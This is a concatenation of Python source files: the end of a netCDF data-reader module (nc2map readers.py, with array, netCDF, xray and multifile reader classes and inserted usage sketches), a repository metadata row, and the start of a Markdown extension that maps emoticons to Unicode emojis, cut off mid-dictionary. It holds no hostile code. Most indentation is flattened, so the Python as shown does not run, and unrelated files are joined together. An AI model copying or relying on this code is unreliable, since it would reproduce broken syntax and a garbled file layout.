- reader: ArrayReader instance
Output:
- dictionary with matches"""
# ---- check grid sizes ----
        if (np.any(self.lon[:] != reader.lon[:])
                or np.any(self.lat[:] != reader.lat[:])):
# raise warning if lens match anyway
if all(len(getattr(reader, dim)) == len(getattr(self, dim))
for dim in ['lat', 'lon']):
critical(
"Attention! Only grid size of %s matches!" % type(
reader))
else:
raise ValueError(
"Grid of %s does not match!" % type(reader))
# ---- check dimensions ----
checks = {}
for dim in ['level', 'time']:
my_dim = getattr(self, dim)
rd_dim = getattr(reader, dim)
if my_dim is None or rd_dim is None:
self.logger.debug("%s in self is None: %s", dim,
my_dim is None)
self.logger.debug("%s in reader is None: %s", dim,
rd_dim is None)
if my_dim is None and rd_dim is None:
self.logger.debug(" --> both None")
checks[dim] = True
else:
checks[dim] = False
checks['base_'+dim] = cycle([None]) if my_dim is None \
else xrange(len(my_dim))
checks['new_'+dim] = cycle([None]) if rd_dim is None \
else xrange(len(rd_dim))
elif len(my_dim) == len(rd_dim):
self.logger.debug(
"Dimension size for %s is the same (%i)", dim,
len(my_dim))
if not np.all(my_dim[:] == rd_dim[:]):
warn("%s informations are not the same!" % dim)
checks[dim] = True
checks['base_'+dim] = [slice(None)]
checks['new_'+dim] = [slice(None)]
elif len(my_dim) == 1 or len(rd_dim) == 1:
self.logger.debug(
"%s size in self: %i", dim, len(my_dim))
self.logger.debug(
"%s size in reader: %i", dim, len(rd_dim))
checks[dim] = False
if len(my_dim) == 1:
checks['base_'+dim] = cycle([0])
checks['new_'+dim] = xrange(len(rd_dim))
else:
checks['base_'+dim] = xrange(len(my_dim))
checks['new_'+dim] = cycle([0])
else:
raise ValueError(
"%s dimensions do not match!" % dim)
return checks
def _check_variables(self, reader):
"""Function to check if variables match
Method is used by _arithmetics to determine how to perform
arithmetics between readers
"""
checks = {}
# ---- check variables ----
my_var_keys = sorted(set(self.variables) - set(self.grid_variables))
rd_var_keys = sorted(
set(reader.variables) - set(reader.grid_variables))
my_nvars = len(my_var_keys)
rd_nvars = len(rd_var_keys)
# if no lola_variables in value: return
if not my_nvars or not rd_nvars:
if not rd_nvars:
warn("Found no longitude-latitude variables in %s!" % (
type(reader)))
if not my_nvars:
warn("Found no longitude-latitude variables in self!")
checks['base'] = False
        # if both have same lengths --> calculate
elif my_nvars == rd_nvars:
self.logger.debug("Found same number of variables: %i",
my_nvars)
# check if variable definitions match
if (not (my_nvars == 1 and rd_nvars == 1)
and not np.all(my_var_keys == rd_var_keys)):
raise ValueError(
"Variables of the first reader (%s) do not match "
"to those of the second (%s)!" % (
', '.join(my_var_keys), ', '.join(rd_var_keys)))
checks['base'] = self
checks['new'] = reader
checks['base_vars'] = my_var_keys
checks['new_vars'] = rd_var_keys
# if one has length 1 --> fill up stream
elif my_nvars == 1 or rd_nvars == 1:
self.logger.debug("Number of variables in %s: %i",
type(reader), rd_nvars)
self.logger.debug("Number of variables in self: %i", my_nvars)
if my_nvars == 1:
checks['base'] = reader
checks['new'] = self
self.logger.debug(" --> Filling up self")
checks['base_vars'] = rd_var_keys
checks['new_vars'] = cycle(my_var_keys)
else:
checks['base'] = self
checks['new'] = reader
self.logger.debug(" --> Filling up %s" % type(reader))
checks['base_vars'] = my_var_keys
checks['new_vars'] = cycle(rd_var_keys)
return checks
def __enter__(self):
return self
def __exit__(self, type, value, tb):
self.close()
def __iadd__(self, value):
"""Self agglomeration method of ArrayReader class"""
def _iadd(v, s, y):
v[s] += y
return v
return self._arithmetics(value, _iadd)
def __add__(self, value):
"""Agglomeration method of ArrayReader class"""
reader = self.copy()
reader += value
return reader
def __imul__(self, value):
"""Self multiplication method of ArrayReader class"""
def _imul(v, s, y):
v[s] *= y
return v
return self._arithmetics(value, _imul)
def __mul__(self, value):
"""Multiplication method of ArrayReader class"""
reader = self.copy()
reader *= value
return reader
def __idiv__(self, value):
"""Self division method of ArrayReader class"""
def _idiv(v, s, y):
v[s] /= y
return v
return self._arithmetics(value, _idiv)
def __div__(self, value):
"""Division method of ArrayReader class"""
reader = self.copy()
reader /= value
return reader
def __isub__(self, value):
"""Self subtraction method of ArrayReader class"""
def _isub(v, s, y):
v[s] -= y
return v
return self._arithmetics(value, _isub)
def __sub__(self, value):
"""Subtraction method of ArrayReader class"""
reader = self.copy()
reader -= value
return reader
def __ipow__(self, value):
"""Self power method of ArrayReader class"""
def _ipow(v, s, y):
v[s] **= y
return v
return self._arithmetics(value, _ipow)
def __pow__(self, value):
"""Subtraction method of ArrayReader class"""
reader = self.copy()
reader **= value
return reader
def __abs__(self):
reader = self.copy()
for varo in reader.variables.values():
varo[:] = abs(varo[:])
return reader
def __str__(self):
strings = [super(ReaderBase, self).__repr__()]
for item in self.get_meta().items():
strings.append(" %s: %s" % item)
strings.append(" variables(dimensions): %s" % (
', '.join(
"%s %s(%s)" % (item[1][:].dtype, item[0],
', '.join(_get_dims(item[1])))
for item in self.variables.items())))
return '\n'.join(strings)
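# --- usage sketch (not part of the original module) -------------------------
# A minimal sketch of the arithmetic support implemented above, assuming an
# ArrayReader (defined below) built from variable definitions the same way as
# in the copy method. The variable name 't2m' and the `_demo_` helper are
# purely illustrative.
def _demo_reader_arithmetics():
    import numpy as np
    data = {
        'lon': {'data': np.arange(10.), 'dims': ('lon',), 'meta': {}},
        'lat': {'data': np.arange(5.), 'dims': ('lat',), 'meta': {}},
        't2m': {'data': np.ones((5, 10)), 'dims': ('lat', 'lon'),
                'meta': {}}}
    reader = ArrayReader(meta={}, **data)
    # __add__ copies the reader first, so `reader` itself stays untouched
    doubled = reader + reader
    # scalars (and plain arrays) are applied to every non-grid variable
    scaled = reader * 3.0
    return doubled, scaled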
class ArrayReader(ReaderBase):
"""Enhanced ReaderBase with methods to rename and create Variables"""
def renameAttribute(self, oldname, newname):
"""Renames the meta attribute 'oldname' to 'newname'"""
try:
self.meta[newname] = self.meta.pop(oldname)
except KeyError:
            raise KeyError(
                "Attribute %s does not exist in reader! Possible attributes "
                "are %s." % (oldname, ', '.join(self.meta)))
def renameVariable(self, oldname, newname):
"""Renames the variable 'oldname' to 'newname' (but not
corresponding dimension! Use the renameDimension method for that.)"""
try:
self.variables[newname] = self.variables.pop(oldname)
self.variables[newname].var = newname
except KeyError:
raise KeyError(
"Variable %s does not exist in reader! Possible variables are "
"%s." % (oldname, ', '.join(self.variables)))
def renameDimension(self, oldname, newname):
"""Renames the dimension 'oldname' to 'newname' (but not
corresponding variables! Use the renameVariable method for that.)"""
exist = False
        for varo in self.variables.values():
            if oldname in varo.dimensions:
                exist = True
                dims = list(varo.dimensions)
                dims[dims.index(oldname)] = newname
                varo.dimensions = tuple(dims)
if not exist:
dims = set(chain(*(
varo.dimensions for varo in self.variables.values())))
warn("Dimension %s not found in reader! Possible dimensions are "
"%s" % (oldname, ', '.join(dims)))
def createVariable(self, data=None, var='var', dims=('time', 'lat', 'lon'),
meta={}, delete=False):
"""Creates a new nc2map.readers.Variable in this ArrayReader
Input:
- data: numpy array with data
- var: name of the variable
- dims: tuple of dimension names (length of dims must match to
length of data.ndim)
          - meta: dictionary containing meta information (e.g. long_name,
units, etc.)
- delete: True/False. If False and the variable name var is already
in use, a ValueError is raised.
Returns:
The created nc2map.readers.Variable instance
"""
        if not delete and var in self.variables:
            raise ValueError(
                "Variable %s already exists in the Reader!" % var)
self.variables[var] = Variable(data=data, var=var, dims=dims,
meta=meta)
return self.variables[var]
def to_NCReader(self, *args, **kwargs):
"""Dumps the data in the ArrayReader instance into a NetCDF file,
        returns the (by default still open) netCDF handle and closes this
ArrayReader instance.
*args and **kwargs are determined by the dump_nc method.
"""
kwargs.setdefault('close', False)
nco = self.dump_nc(*args, **kwargs)
self.close()
return nco
def __getattr__(self, attr):
try:
return self.meta[attr]
except KeyError:
raise AttributeError(
"'%s' object has no attribute '%s'" % (
self.__class__.__name__, attr))
def __dir__(self):
return dir(super(ArrayReader, self)) + self.meta.keys()
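# --- usage sketch (not part of the original module) -------------------------
# A short, hypothetical example of the editing helpers defined above
# (createVariable, renameVariable, renameDimension); the array contents and
# the variable names are made up for illustration.
def _demo_edit_arrayreader(reader):
    import numpy as np
    # wire a new nc2map.readers.Variable into the reader
    reader.createVariable(data=np.zeros((5, 10)), var='precip',
                          dims=('lat', 'lon'),
                          meta={'long_name': 'precipitation'})
    # renameVariable only renames the variable itself ...
    reader.renameVariable('precip', 'pr')
    # ... while renameDimension renames the dimension in all variables
    reader.renameDimension('lat', 'latitude')
    return reader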
class NCReader(ReaderBase):
"""nc2map compatible netCDF4.Dataset class
The netCDF4.Dataset instance is stored in nco attribute.
For initialization see __init__ method"""
nco_base = nc.Dataset
def __init__(self, *args, **kwargs):
"""Initialization method of NCReader instance
Parameters
----------
*args
Determined by the netCDF4.Dataset class
**kwargs
            Determined by the netCDF4.Dataset class (apart from the
            parameters below)
        Other Parameters
        ----------------
timenames: set of strings
Dimension and variable names that shall be considered as time
dimension or variable
levelnames: set of strings
Dimension and variable names that shall be considered as level
dimension or variable
lonnames: set of strings
Dimension and variable names that shall be considered as longitude
dimension or variable
latnames: set of strings
Dimension and variable names that shall be considered as latitude
dimension or variable
udims: set of strings
            Dimension names that indicate that the variable is defined on an
unstructured grid
ufuncs: list
            list containing interpretation functions for unstructured grids
(see below). Default grid interpretation functions are for
the ugrid conventions of triangular grids and for the ICON grid.
See Also
--------
nc2map.readers.ReaderBase: Basic class for reader interpretation"""
# docstring is extended below
self.nco = None
self.set_logger()
self.logger.debug('Initialization arguments:')
for arg in args:
self.logger.debug(' %s', arg)
self.logger.debug('Initialization keyword arguments:')
for item in kwargs.items():
self.logger.debug(' %s: %s', *item)
# set timenames, levelnames, lonnames and latnames
dimnames = {'timenames', 'levelnames', 'lonnames', 'latnames'}
# convert from string to list
for key in dimnames:
if key in kwargs and isinstance(kwargs[key], str):
kwargs[key] = [kwargs[key]]
for key, val in defaultnames.items():
setattr(self, key, set(kwargs.get(key, val)))
self.ufuncs = kwargs.pop('ufuncs', ufuncs)
# delete timenames, levelnames, lonnames and latnames key from kwargs
kwargs = {key: val for key, val in kwargs.items()
if key not in dimnames}
# save args and kwargs for initialization
self._init_args = args[:]
self._init_kwargs = kwargs.copy()
# init netCDF.MFDataset
self.nco = self.nco_base(*args, **kwargs)
self._set_grid_file(*args, **kwargs)
def _set_grid_file(self, *args, **kwargs):
"""Sets the _grid_file from kwargs['filename'], kwargs['files'][0],
args[0] and self.filepath()"""
success = False
for key in ['filename', 'files', 'filename_or_obj']:
try:
self._grid_file = kwargs.pop(key)
success = True
break
except KeyError:
pass
if not success:
try:
self._grid_file = args[0]
except IndexError:
# use netCDF4.Dataset.filepath method
self._grid_file = self.filepath()
except ValueError:
warn("Could not get file name of grid file!")
                self.logger.debug(
                    "Could not get file name of grid file!", exc_info=True)
return
try:
self._grid_file = glob.glob(self._grid_file)[0]
except TypeError:
self._grid_file = glob.glob(self._grid_file[0])[0]
except:
warn("Could not get file name of grid file!")
def to_ArrayReader(self):
"""Same as copy method but closes this instance as well"""
newreader = self.copy()
self.close()
return newreader
def set_meta(self, var=None, **meta):
"""Set meta information.
Input:
- var: string. Variable name. If None, the meta information is
regarded as global meta information
Keyword arguments (meta) describe the key, value pairs for the
        meta information"""
if var is not None and var not in self.variables.keys():
raise KeyError('Unknown variable %s' % var)
if var is None:
self.nco.setncatts(meta)
else:
self.nco.variables[var].setncatts(meta)
def get_meta(self, var=None):
"""Get meta information.
Input:
- var: string. Variable name. If None, the meta information is
regarded as global meta information"""
possible_keys = self.variables.keys() + list(self._timenames) + list(
self._levelnames) + list(self._lonnames) + list(self._latnames)
if var is not None and var not in possible_keys:
raise KeyError('Unknown variable %s' % var)
if var is None:
obj = self
elif var in self._lonnames:
obj = self.lon
elif var in self._latnames:
obj = self.lat
elif var in self._timenames:
obj = self.time
elif var in self._levelnames:
obj = self.level
else:
obj = self.variables[var]
return OrderedDict([(key, getattr(obj, key)) for key in obj.ncattrs()])
def close(self):
"""Close the NCReader instance"""
self.nco.close()
self.nco = None
def __dir__(self):
return dir(super(NCReader, self)) + dir(self.nco)
def __getattr__(self, attr):
"""Tries to get attribute defined by this class and if not available,
return attribute from nco attribute"""
if attr in self.__dict__.keys():
return getattr(self, attr)
elif hasattr(self.nco, attr):
return getattr(self.nco, attr)
else:
raise AttributeError(
"'%s' object has no attribute '%s'" % (
self.__class__.__name__, attr))
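# --- usage sketch (not part of the original module) -------------------------
# Opening a file with NCReader, assuming a hypothetical 'example.nc'.
# Positional and keyword arguments are passed straight to netCDF4.Dataset,
# and unknown attributes are delegated to the wrapped Dataset instance.
def _demo_ncreader(path='example.nc'):
    with NCReader(path) as reader:  # __enter__/__exit__ from ReaderBase
        meta = reader.get_meta()  # global netCDF attributes
        dims = list(reader.nco.dimensions)  # direct access to the Dataset
    return meta, dims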
class XrayReader(NCReader):
@staticmethod
def nco_base(filename_or_obj, *args, **kwargs):
kwargs.setdefault('decode_times', False)
if isinstance(filename_or_obj, xrayDataset):
return filename_or_obj
return open_dataset(filename_or_obj, *args, **kwargs)
def set_meta(self, var=None, **meta):
"""Set meta information.
Input:
- var: string. Variable name. If None, the meta information is
regarded as global meta information
Keyword arguments (meta) describe the key, value pairs for the
        meta information"""
if var is not None and var not in self.variables.keys():
raise KeyError('Unknown variable %s' % var)
if var is None:
self.nco.attrs.update(meta)
else:
            self.nco.variables[var].attrs.update(meta)
def _set_grid_file(self, filename_or_obj, *args, **kwargs):
if isinstance(filename_or_obj, xrayDataset):
self._grid_file = None
return
else:
return super(XrayReader, self)._set_grid_file(
filename_or_obj=filename_or_obj, *args, **kwargs)
def get_meta(self, var=None):
"""Get meta information.
Input:
- var: string. Variable name. If None, the meta information is
regarded as global meta information"""
possible_keys = self.variables.keys() + list(self._timenames) + list(
self._levelnames) + list(self._lonnames) + list(self._latnames)
if var is not None and var not in possible_keys:
raise KeyError('Unknown variable %s' % var)
if var is None:
obj = self
elif var in self._lonnames:
obj = self.lon
elif var in self._latnames:
obj = self.lat
elif var in self._timenames:
obj = self.time
elif var in self._levelnames:
obj = self.level
else:
obj = self.variables[var]
return OrderedDict(obj.attrs)
class MFXrayReader(XrayReader):
@staticmethod
def nco_base(*args, **kwargs):
kwargs.setdefault('decode_times', False)
return open_mfdataset(*args, **kwargs)
class MFNCReader(NCReader):
"""nc2map compatible netCDF4.MFDataset class
Designed to manage a multifile dataset"""
nco_base = nc.MFDataset
def __init__(self, *args, **kwargs):
"""Initialization method of MFNCReader instance
Keyword arguments (kwargs) may be
        - levelnames: set of strings: Gives the names of the level dimension
            that will be searched for in the netCDF file
        - timenames: set of strings: Gives the names of the time dimension
            that will be searched for in the netCDF file
        - lonnames: set of strings: Gives the names of the longitude dimension
            that will be searched for in the netCDF file
        - latnames: set of strings: Gives the names of the latitude dimension
            that will be searched for in the netCDF file
Further args and kwargs are determined by the netCDF4.MFDataset
instance:
"""
super(MFNCReader, self).__init__(*args, **kwargs)
def set_meta(self, var=None, **meta):
"""Set meta information.
Input:
- var: string. Variable name. If None, the meta information is
regarded as global meta information
Keyword arguments (meta) describe the key, value pairs for the
        meta information"""
raise ValueError(
"nc.MFDataset does not support setting of meta data information!")
class FlexibleReader(MFNCReader):
"""Class to handle unstructered grids that vary with time
    This class is intended to manage 2D flexible mesh topologies, see
    https://github.com/ugrid-conventions/ugrid-conventions/blob/v0.9.0/ugrid-conventions.md#2d-flexible-mesh-mixed-triangles-quadrilaterals-etc-topology
It is assumed that each file contains exactly one time step on a flexible
mesh. The get_data method does not accept '3d' and '4d' data shapes
``*args`` and ``**kwargs`` are the same as for :class:`MFNCReader`
Attributes
----------
unlimited: string, name of the unlimited dimension
"""
@property
def unlimited(self):
"""Name of the unlimited dimension in the files"""
return next(dim for dim, obj in self.nco.dimensions.items()
if obj.isunlimited())
@property
def unlimiteddim(self):
"""Variable corresponding to the unlimited dimension"""
return self.__nco.variables[self.unlimited]
@property
def unlimitedlist(self):
"""Alternative list of names for the unlimited dimension in the
files"""
unlimited = self.unlimited
for l in (self._levelnames, self._timenames, self._lonnames,
self._latnames):
if unlimited in l:
return l
return {unlimited}
def __init__(self, *args, **kwargs):
# same docstring as for MFNCReader.__init__
super(FlexibleReader, self).__init__(*args, **kwargs)
# the nco attribute will be overwritten when get_data is called
self.__nco = self.nco
def get_data(self, *args, **kwargs):
# same docstring as for MFNCReader.get_data
unlimited = set(kwargs) & self.unlimitedlist
if unlimited:
unlimited = list(unlimited)[0]
if unlimited in self._timenames:
dim_slice = self.get_time_slice(kwargs[unlimited])
else:
dim_slice = kwargs[unlimited]
else:
unlimited = self.unlimited
dim_slice = 0
if isinstance(dim_slice, slice):
dim_slice = range(*dim_slice.indices(len(self.unlimiteddim)))
try:
if len(dim_slice) > 1:
raise ValueError(
"It is impossible to return more than one step of the "
"unlimited variable %s. Use the gen_data method "
"instead." % unlimited)
self.nco = self.__nco._cdf[dim_slice[0]]
kwargs[unlimited] = [0]
except TypeError:
self.nco = self.__nco._cdf[dim_slice]
kwargs[unlimited] = 0
        try:
            return super(FlexibleReader, self).get_data(*args, **kwargs)
        finally:
            self.nco = self.__nco
    __init__.__doc__ = MFNCReader.__init__.__doc__
    get_data.__doc__ = MFNCReader.get_data.__doc__
# ------------ modify docstrings here ------------------
auto_set_reader.__doc__ += ', '.join(readers)
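# --- usage sketch (not part of the original module) -------------------------
# Finally, a hedged example of the get_data/gen_data interface documented
# above. The file name, the variable 't2m' and the dimension values are
# hypothetical; passing an iterable for `time` makes gen_data loop over it.
def _demo_gen_data(path='example.nc'):
    reader = NCReader(path)
    # one 2-dimensional lon-lat DataField per requested time step
    for field in reader.gen_data('t2m', datashape='2d',
                                 time=range(12), level=0):
        print(field.dimensions)
    reader.close()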
| Chilipp/nc2map | readers.py | Python | gpl-2.0 | 129,034 | ["NetCDF"] | 9f005a857e866b94a6a15a58fdd5ba0f92d555db673851a7937547bb5547552f |
# coding: utf-8
"""
Unicode Emojis for Python-Markdown
==================================
Converts defined emoticon symbols to Unicode emojis, supported on a
variety of devices [1].
[1]: http://apps.timwhitlock.info/emoji/tables/unicode#block-1-emoticons
Usage:
>>> from __future__ import print_function
>>> from markdown import markdown
>>> text = 'I <3 you! Just kidding. :P'
>>> print(markdown(text, ['unimoji'])) # doctest: +NORMALIZE_WHITESPACE
<p>I <span class="emoji" style="color:red">❤</span> you! \
Just kidding. <span class="emoji">😛</span></p>
**NOTE**: The emojis are only replaced when whitespace-delimited on both sides!
The following options are accepted:
- `emoji`, the emoticon-to-list-of-aliases mapping,
- `span_class`, the class name of the encompassing `<span>` element
(default: 'emoji'). No element is created if `None`.
An example with these custom settings:
>>> from mdx_unimoji import UnimojiExtension
>>> img_heart = '<img alt="love" src="heart.png"/>'
>>> img_tongue = '<img alt=":P" src="tongue.png"/>'
>>> overrides = UnimojiExtension.EMOJI
>>> overrides.update({img_heart: ['<3'],
... img_tongue: ':p :P :-p :-P'.split()})
>>> print(markdown(text,
... extensions=[UnimojiExtension(span_class='other',
... emoji=overrides)]))
... # doctest: +NORMALIZE_WHITESPACE
<p>I <img alt="love" class="other" src="heart.png" /> you! \
Just kidding. <img alt=":P" class="other" src="tongue.png" /></p>
You can use the `span_class` value in your CSS, e.g.:
.emoji {
font-family: "Apple Color Emoji", "Segoe UI Emoji",
"Noto Color Emoji", EmojiSymbols, "DejaVu Sans", Symbola;
}
HF!
"""
from __future__ import unicode_literals
from markdown import Extension
from markdown.util import etree
from markdown.inlinepatterns import Pattern
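# A rough, hypothetical sketch of the mechanism this extension builds on
# (illustrative only; the actual wiring happens in UnimojiExtension below):
# the emoticon-to-aliases table is inverted into one alternation regex that
# a markdown.inlinepatterns.Pattern subclass can match against.
import re


def _demo_build_pattern(emoji):
    # alias -> emoji lookup; longest aliases first so ':-)' beats ':)'
    lookup = dict((alias, char) for char, aliases in emoji.items()
                  for alias in aliases)
    alternatives = sorted(lookup, key=len, reverse=True)
    pattern = r'(%s)' % '|'.join(re.escape(alias) for alias in alternatives)
    return lookup, pattern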
class UnimojiExtension(Extension):
    EMOJI = { '😆': ":lol: :funny: :happy: :glad: xD XD :contented: :satisfied: :laughing:".split(),
'😊': ":) :-) :] :-] =) =] ^^ ^_^ :smile: :crush: :embarrassed: :shy: :blush:".split(),
'😃': ":smiley:".split(),
'😏': ":> :-> :mean: :smug: :smirk:".split(),
'😍': ":crush: :heart_eyes:".split(),
              '😘': ";* ;-* :kiss: :kissing_heart:".split(),
'😚': ":* :-* :kissing_closed_eyes:".split(),
'😳': ":$ :-$ :flustered: :embarassed: :flattered: :flushed:".split(),
'😌': ":relaxed: :phew: :massage: :happiness: :relieved:".split(),
'😁': ":grin:".split(),
'😉': ";) ;-) ;] ;-] :flirt: :mischievous: :secret: :wink:".split(),
'😜': ";p ;-p ;P ;-P :childish: :mischievous: :stuck_out_tongue_winking_eye:".split(),
'😝': ":mischievous: :stuck_out_tongue_closed_eyes:".split(),
'😀': ":smiling: :grinning:".split(),
'😗': ":3: :kissing:".split(),
'😙': ":smooch: :kissing_smiling_eyes:".split(),
'😛': ":p :-p :P :-P =p =P :childish: :playful: :mischievous: :stuck_out_tongue:".split(),
'😴': ":asleep: :tired: :sleepy: :night: :zzz: :sleeping:".split(),
'😟': ":frustrated: :scared: :concern: :nervous: :worried:".split(),
'😦': ":aw: :what: :frowning:".split(),
'😧': ":stunned: :nervous: :anguished:".split(),
'😮': ":surprise: :impressed: :wow: :open_mouth:".split(),
'😬': ":grimace: :teeth: :grimacing:".split(),
'😕': ":baffled: :puzzled: :indifference: :huh: :weird: :hmmm: :confused:".split(),
'😯': ":woo: :shh: :conceal: :hide:".split(),
'😑': "-_- :deadpan: :indifferent: :meh: :expressionless:".split(),
'😒': ":/ :-/ :\\ :-\\ =/ =\\ :L :sarcasm: :indifference: :bored: :straight: :serious: :unamused:".split(),
'😅': ":relief: :laugh: :sweat_smile:".split(),
'😓': ":-X :X :-# :# :-& :& :stressed: :tired: :exercise: :sweat:".split(),
'😥': ":phew: :sweat: :nervous: :disappointed_relieved:".split(),
'😩': ":tired: :sleepy: :frustrated: :upset: :weary:".split(),
'😔': ":depressed: :okay: :upset: :pensive:".split(),
'😞': ":( :-( ;( ;-( =( =[ :lonely: :upset: :depressed: :disappointed:".split(),
'😖': ":s :-s :S :-S :confused: :sick: :unwell: :oops: :confounded:".split(),
'😨': ":scared: :afraid: :nervous: :scared: :terrified: :oops: :huh: :fearful:".split(),
'😰': ":scared: :frightened: :nervous: :scared: :cold_sweat:".split(),
'😣': "x( X( :sick: :no: :upset: :oops: :persevere:".split(),
'😢': ":,( :'( =,( ='( :tear: :tears: :depressed: :upset: :cry:".split(),
'😭': ":sad: :cry: :tears: :upset: :depressed: :sob:".split(),
'😂': ":,D :'D =,D ='D :happytears: :cry: :tears: :weep: :haha: :joy:".split(),
'😲': ":O :-O 8-O =O :xox: :surprised: :poisoned: :astonished:".split(),
'😱': ":halloween: :scary: :scared: :terrified: :munch: :omg: :scream:".split(),
'😫': ":sick: :whine: :upset: :frustrated: :tired_face:".split(),
'😠': ">:( >=( :mad: :annoyed: :frustrated: :angry:".split(),
'😡': ":furious: :mad: :hate: :despise: :rage:".split(),
'😤': ":gas: :phew: :proud: :pride: :triumph:".split(),
'😪': ":tired: :zzz: :rest: :nap: :sleepy:".split(),
'😋': ":delicious: :tongue: :silly: :yummy: :yum:".split(),
'😷': ":sick: :ill: :disease: :mask:".split(),
'😎': "8) 8-) :shades: :sunglasses:".split(),
'😵': "x-O X-O :ko: :spent: :unconscious: :xox: :dizzy_face:".split(),
'👿': ":devil: :horns: :imp:".split(),
'😈': "3:) 3:-) >:) >:-) >;) >;-) :devil: :horns: :smiling_imp:".split(),
'😐': ":indifference: :meh: :neutral_face:".split(),
'😶': ":hellokitty: :silent:".split(),
'😇': "O:) O:-) :angel: :heaven: :halo: :innocent:".split(),
              '👽': ":extraterrestrial: :UFO: :paul: :weird: :outer_space: :alien:".split(),
'💛': ":yellow_heart:".split(),
'💙': ":blue_heart:".split(),
'💜': ":purple_heart:".split(),
'❤': "<3 :heart:".split(),
'💚': ":green_heart:".split(),
'💔': "</3 :sorry: :break: :broken_heart:".split(),
'💓': ":heartbeat:".split(),
'💗': ":heartpulse:".split(),
'💕': ":two_hearts:".split(),
'💞': ":revolving_hearts:".split(),
'💘': ":cupid:".split(),
'💖': ":sparkling_heart:".split(),
'✨': ":stars: :shine: :shiny: :awesome: :good: :magic: :sparkles:".split(),
'⭐': ":night: :star:".split(),
'💫': ":sparkle: :shoot: :dizzy:".split(),
'💥': ":explosion: :bomb: :explode: :collision: :blown: :boom: :accident: :fight: :boom:".split(),
'💢': ":mad: :anger:".split(),
              '❗': ":danger: :surprise: :shocked: :surprised: :punctuation: :wow: :warning: :heavy_exclamation_mark: :exclamation:".split(),
'❓': ":doubt: :confused: :question:".split(),
'❕': ":surprise: :punctuation: :gray: :wow: :warning: :grey_exclamation:".split(),
'❔': ":doubts: :gray: :huh: :grey_question:".split(),
'💤': ":sleep: :bored: :sleepy: :tired: :zzz:".split(),
'💨': ":wind: :air: :fast: :shoo: :fart: :smoke: :puff: :dash:".split(),
'💦': ":drip: :oops: :sweat_drops:".split(),
'🎶': ":notes:".split(),
'🎵': ":tone: :musical_note:".split(),
'🔥': ":cook: :flame: :fire:".split(),
              '💩': ":poop: :shitface: :fail: :turd: :hankey: :shit:".split(),
'👍': ":thumbsup: :yes: :agree: :accept: :cool: :+1:".split(),
'👎': ":dislike: :no: :thumbsdown: :-1:".split(),
'👌': ":limbs: :perfect: :ok_hand:".split(),
              '👊': ":pound: :violence: :fist: :hit: :attack: :punch: :facepunch:".split(),
'✊': ":grasp: :fist:".split(),
'✌': ":peace: :deuces: :ohyeah: :victory: :two: :v:".split(),
'👋': ":hi: :hello: :bye: :hands: :gesture: :goodbye: :solong: :farewell: :palm: :wave:".split(),
              '✋': ":stop: :highfive: :palm: :ban: :raised_hand: :hand:".split(),
'👐': ":butterfly: :open_hands:".split(),
'☝': ":point_up:".split(),
'👇': ":point_down:".split(),
'👈': ":point_left:".split(),
'👉': ":point_right:".split(),
'🙌': "\\o/ :gesture: :hooray: :yea: :celebration: :raised_hands:".split(),
'🙏': ":please: :hope: :wish: :namaste: :pray:".split(),
'👏': ":hands: :praise: :applause: :congrats: :yay: :clap:".split(),
'💪': ":arm: :flex: :strong: :muscle:".split(),
              '🏃': ":walking: :exercise: :race: :runner: :running:".split(),
'👫': ":date: :dating: :marriage: :couple:".split(),
'👪': ":parents: :family:".split(),
'👬': ":gay: :couple: :bromance: :friendship: :two_men_holding_hands:".split(),
'👭': ":gay: :friendship: :couple: :lesbian: :two_women_holding_hands:".split(),
'💃': ":dancer:".split(),
'👯': ":bunny: :girls: :dancers:".split(),
'🙆': ":ok_woman:".split(),
'🙅': ":nope: :no_good:".split(),
'💁': ":information_desk_person:".split(),
'🙋': ":raising_hand:".split(),
'👰': ":couple: :marriage: :wedding: :bride_with_veil:".split(),
'🙎': ":person_with_pouting_face:".split(),
'🙍': ":depressed: :discouraged: :person_frowning:".split(),
'🙇': ":bow:".split(),
'💏': ":dating: :marriage: :couplekiss:".split(),
'💑': ":dating: :marriage: :couple_with_heart:".split(),
'💆': ":head: :massage:".split(),
'💇': ":haircut:".split(),
'💅': ":manicure: :beauty: :finger: :nail_care:".split(),
'👦': ":boy:".split(),
'👧': ":girl:".split(),
'👩': ":girls: :lady: :woman:".split(),
'👨': ":mustache: :dad: :classy: :sir: :moustache: :man:".split(),
'👶': ":infant: :child: :toddler: :baby:".split(),
'👵': ":grandma: :granny: :lady: :older_woman:".split(),
'👴': ":grandpa: :grandad: :men: :older_man:".split(),
'👱': ":blonde: :person_with_blond_hair:".split(),
'👲': ":man_with_gua_pi_mao:".split(),
'👳': ":indian: :hinduism: :arabs: :man_with_turban:".split(),
'👷': ":wip: :build: :construction_worker:".split(),
'👮': ":police: :policeman: :arrest: :911: :cop:".split(),
'👼': ":heaven: :wings: :halo: :angel:".split(),
'👸': ":blond: :crown: :royal: :queen: :princess:".split(),
'😺': ":^D =^D :smiley_cat:".split(),
'😸': ":^) :} :-} :3 :-3 :smile_cat:".split(),
'😻': ":heart_eyes_cat:".split(),
'😽': ":kissing_cat:".split(),
'😼': ":smirk_cat:".split(),
'🙀': ":munch: :scared: :scream_cat:".split(),
'😿': ":^( :{ :tears: :weep: :upset: :crying_cat_face:".split(),
'😹': ":haha: :tears: :joy_cat:".split(),
'😾': ":pouting_cat:".split(),
'👹': ":namahage: :monster: :mask: :halloween: :scary: :creepy: :devil: :demon: :japanese_ogre:".split(),
'👺': ":tengu: :evil: :mask: :monster: :scary: :creepy: :japanese_goblin:".split(),
'🙈': ":haha: :see_no_evil:".split(),
'🙉': ":hear_no_evil:".split(),
'🙊': ":omg: :speak_no_evil:".split(),
'💂': ":royal: :guardsman:".split(),
'💀': ":scary: :halloween: :dead: :skeleton: :creepy: :skull:".split(),
'🐾': ":tracking: :footprints: :dog: :cat: :paw_prints: :feet:".split(),
'👄': ":mouth: :kiss: :lips:".split(),
'💋': ":lips: :kiss:".split(),
'💧': ":drip: :faucet: :droplet:".split(),
'👂': ":hear: :listen: :ear:".split(),
'👀': ":eye-rolling: :look: :watch: :stalk: :peek: :see: :eyes:".split(),
'👃': ":smell: :sniff: :nose:".split(),
'👅': ":mouth: :playful: :tongue:".split(),
'💌': ":envelope: :love_letter:".split(),
'👤': ":user: :person: :bust_in_silhouette:".split(),
'👥': ":group: :team: :busts_in_silhouette:".split(),
'💬': ":bubble: :message: :talk: :chatting: :speech_balloon:".split(),
'💭': ":cloud: :speech: :thinking: :thought_balloon:".split(),
'☀': ":brightness: :sunny:".split(),
'☂': ":rain: :rainy: :umbrella:".split(),
'☁': ":sky: :cloud:".split(),
'❄': ":snowflake:".split(),
